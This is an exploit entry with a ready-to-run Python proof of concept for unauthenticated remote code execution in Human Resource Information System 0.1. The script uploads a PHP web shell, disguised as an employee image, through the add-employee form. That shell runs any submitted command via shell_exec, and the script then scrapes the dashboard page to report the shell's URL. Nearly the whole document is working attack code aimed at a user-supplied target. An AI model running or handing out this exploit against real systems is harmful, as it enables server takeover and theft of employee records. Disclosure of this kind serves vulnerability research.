# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11 , Linux x64_x86
############################################################################################################
# Description:
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
############################################################################################################
# Proof of concept:
#!/usr/bin/python3
import requests
import sys
from bs4 import BeautifulSoup
def find_shell(domain):
req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")
soup = BeautifulSoup(req_2.content , "html.parser")
imgs = soup.find_all("img")
for i in imgs:
src = i['src']
if ("shell.php" in src):
print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")
break
else:
continue
def upload_file(domain):
print("\n [!] Uploading Shell . . .")
payload = """
<!DOCTYPE html>
<html>
<head>
<title> Shell </title>
</head>
<body>
<form action="#" method="post">
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">
<br><br>
<input type="submit" name="submit" value="execute">
</form>
<?php
$cmd = $_POST['cmd'];
$result = shell_exec($cmd);
echo "<pre>{$result}</pre>";
?>
</body>
</html>
"""
h = {
"Content-Type" : "multipart/form-data"
}
f = {'employee_image':('shell.php',payload,
'application/x-php', {'Content-Disposition': 'form-data'}
)
}
d = {
"emplo" : "",
"employee_companyid" : "test",
"employee_firstname" : "test",
"employee_lastname" : "test",
"employee_middlename" : "test",
"branches_datefrom" : "0011-11-11",
"branches_recentdate" : "2222-11-11",
"employee_position" : "test",
"employee_contact" : "23123132132",
"employee_sss" : "test",
"employee_tin" : "test",
"employee_hdmf_pagibig" : "test",
"employee_gsis" : "test"
}
url = domain + "/Admin_Dashboard/process/addemployee_process.php"
req = requests.post(url , data=d , files = f)
if req.status_code == 200:
if ("Insert Successfully" in req.text):
print("\n [!] Shell uploaded succefully\n")
find_shell(domain)
else:
print("Exploit Failed 1")
def main():
if len(sys.argv) != 2:
print('[!] usage: %s <target url> ' % sys.argv[0])
print('[!] eg: %s http://vulndomain.com' % sys.argv[0])
sys.exit(-1)
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
print("<> Human Resource Information System <>")
print("<> Shell Uploader <>")
print("<><><><><><><><><><><><><><><><><><><><><><><><>")
target_domain = sys.argv[1]
upload_file(target_domain)
if __name__ == "__main__":
main()